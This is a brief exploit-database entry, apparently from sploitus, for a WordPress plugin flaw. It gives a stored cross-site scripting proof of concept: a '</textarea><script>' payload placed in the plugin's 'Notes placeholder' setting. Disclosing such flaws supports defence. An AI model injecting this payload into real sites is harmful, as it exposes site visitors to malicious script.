Share
## https://sploitus.com/exploit?id=WPEX-ID:B766103A-7F91-4D91-9F9C-BFF4BFD53F57
Put the following payload in the "Notes placeholder" settings of the plugin: </textarea><script>alert(/XSS/)</script>